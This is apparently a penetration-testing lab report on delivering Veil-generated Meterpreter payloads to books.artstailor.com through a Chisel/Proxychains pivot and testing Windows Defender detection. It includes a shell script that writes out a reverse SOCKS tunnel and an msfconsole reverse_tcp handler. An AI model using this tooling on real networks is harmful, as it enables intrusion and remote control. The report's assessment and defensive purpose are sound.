Gary Jones

Establishing a Meterpreter Session with Veil and Bypassing Detection

Situation:

This exercise used the Veil framework to generate a reverse TCP Meterpreter payload and deliver it to books.artstailor.com. The goal was to test whether Windows Defender would identify the payload statically (on the file itself) or dynamically (at execution time). Because books.artstailor.com was not directly reachable, a pivot was set up through costumes.artstailor.com to bypass the firewall restrictions and deliver the payload.


Obstacles:

  1. Antivirus Detection:
    • Windows Defender identified both the Python and the C# payload, but at different stages.
    • The Python payload was flagged dynamically, after briefly executing, while the C# payload was flagged statically, before it could run.
  2. Payload Delivery:
    • File-sharing restrictions and antivirus scanning complicated the transfer of the payload executable.
  3. Limited Execution Time:
    • Meterpreter session established by the Python payload was terminated almost immediately by Windows Defender.

Actions Taken:

  1. Establishing Access to books.artstailor.com:
    • Initiated a remote desktop session to costumes.artstailor.com using administrative credentials.
    • Set up a Chisel proxy and configured Proxychains to forward traffic to books.artstailor.com.
    • Established a second remote desktop session to books.artstailor.com using n.nomen credentials.
  2. Generating Payloads with Veil:
    • Created a reverse TCP Meterpreter payload with Veil in two variants, Python and C#.
    • Configured the Veil handler and the Metasploit resource file (meterp.rc) used to start the listener in msfconsole.
    • Used PyInstaller with Wine to package the Python payload into a distributable .exe file.
  3. Delivering and Executing Payloads:
    • Shared the distribution directory containing the executable via the /tmp folder on books.artstailor.com.
    • Executed the Python and C# payloads sequentially to observe Windows Defender's behavior.
  4. Testing Defender's Response:
    • Noted that the Python payload was dynamically flagged, while the C# payload was immediately identified as malicious.
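The pivot and handler setup in steps 1 and 2 above, as an added example that is not part of the original write-up. The script generates the Chisel commands, the Proxychains configuration and an msfconsole resource file equivalent to the meterp.rc Veil writes next to its payloads, and checks that the handler matches the values the payload was built with. The attacker address 10.10.14.5, the Chisel port 8000, the SOCKS port 1080, the handler port 4444, a Windows pivot running chisel.exe and xfreerdp as the RDP client are all assumptions; nothing here is taken from the engagement.

```shell
#!/bin/sh
# Added example, not from the original write-up. All addresses and ports are
# assumptions chosen for illustration (see the lead-in).
ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"
CHISEL_PORT="${CHISEL_PORT:-8000}"
SOCKS_PORT="${SOCKS_PORT:-1080}"
LPORT="${LPORT:-4444}"

# Attacker side: a Chisel server that accepts reverse tunnels. Without
# --reverse the client's R: request below is refused.
chisel_server_cmd() {
    printf 'chisel server --port %s --reverse\n' "$CHISEL_PORT"
}

# Pivot side (run on costumes.artstailor.com over the RDP session; assumed to
# be Windows). R:<port>:socks opens a SOCKS5 listener on the attacker's box
# whose traffic leaves from the pivot, so internal hosts such as
# books.artstailor.com become reachable.
chisel_client_cmd() {
    printf 'chisel.exe client %s:%s R:%s:socks\n' "$ATTACKER_IP" "$CHISEL_PORT" "$SOCKS_PORT"
}

# Proxychains configuration pointing at that SOCKS listener. proxy_dns keeps
# name resolution for the internal hostnames inside the tunnel instead of
# sending it to the attacker's own resolver, where it would fail or leak.
write_proxychains_conf() {
    cat > "$1" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $SOCKS_PORT
EOF
}

# RDP to the internal host through the pivot: $1 proxychains config,
# $2 target host, $3 user. The password is prompted for by xfreerdp.
rdp_cmd() {
    printf 'proxychains -f %s xfreerdp /v:%s /u:%s\n' "$1" "$2" "$3"
}

# Handler resource file for msfconsole (run with: msfconsole -r meterp.rc).
# LHOST/LPORT must match what was baked into the payload at generation time.
write_handler_rc() {
    cat > "$1" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ATTACKER_IP
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

# Sanity check before starting the listener: a handler whose LHOST/LPORT do
# not match the payload's callback address never receives the session, which
# looks identical to the payload being blocked by Defender.
check_handler_rc() {
    grep -q "^set LHOST $ATTACKER_IP\$" "$1" && grep -q "^set LPORT $LPORT\$" "$1"
}

# Print the commands in the order they are run.
chisel_server_cmd
chisel_client_cmd
```

Run the Chisel server first, then the client on the pivot, then `proxychains -f <conf> xfreerdp ...` for the second RDP hop; the handler should be listening before the payload is executed on the target, since a session that lands on a closed port is lost.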

Results:

  1. Antivirus Behavior:
    • Python Payload: Briefly established a Meterpreter session before the process was terminated by Windows Defender's behavioural (dynamic) detection.
    • C# Payload: Statically flagged and blocked before execution.
  2. Access Achieved:
    • Successfully connected to books.artstailor.com and executed payloads despite file-sharing restrictions.
    • Managed to observe payload behavior for analysis purposes.
  3. Risk Level:
    • Medium: The payloads were only partially successful, but the exercise showed that lateral movement by RDP and proxying through costumes.artstailor.com was possible with the available administrative credentials, highlighting weaknesses in network segmentation and credential management.

Tool Purpose Overview:

Veil:

  • A tool for generating payloads designed to evade antivirus detection, used here to create Python and C# reverse TCP Meterpreter executables.

PyInstaller:

  • A Python packaging tool used with Wine to convert Python payloads into executable files for Windows.

Proxychains:

  • Configured to route traffic through a Chisel proxy, enabling access to internal hosts like books.artstailor.com.

Chisel:

  • A tunneling tool used to create a reverse SOCKS proxy on the pivot host, so that traffic to internal hosts bypasses the firewall restrictions between network segments.

msfconsole:

  • The Metasploit Framework console used to establish and handle Meterpreter sessions.

Recommendations:

  1. Enhance Antivirus Detection:
    • Regularly update antivirus definitions to detect obfuscated payloads effectively.
    • Employ behavioral analysis tools to identify anomalous execution patterns.
  2. Secure Credential Management:
    • Enforce strong password policies for all domain and local accounts.
    • Rotate credentials periodically and monitor for unauthorized access attempts.
  3. Limit Internal Access:
    • Restrict remote desktop and proxy access to trusted IPs and users.
    • Implement strict file-sharing policies and scan shared folders for potential threats.
  4. Harden Development Environments:
    • Disable or restrict execution of unsigned executables and scripts.
    • Use application whitelisting to control which executables may run.
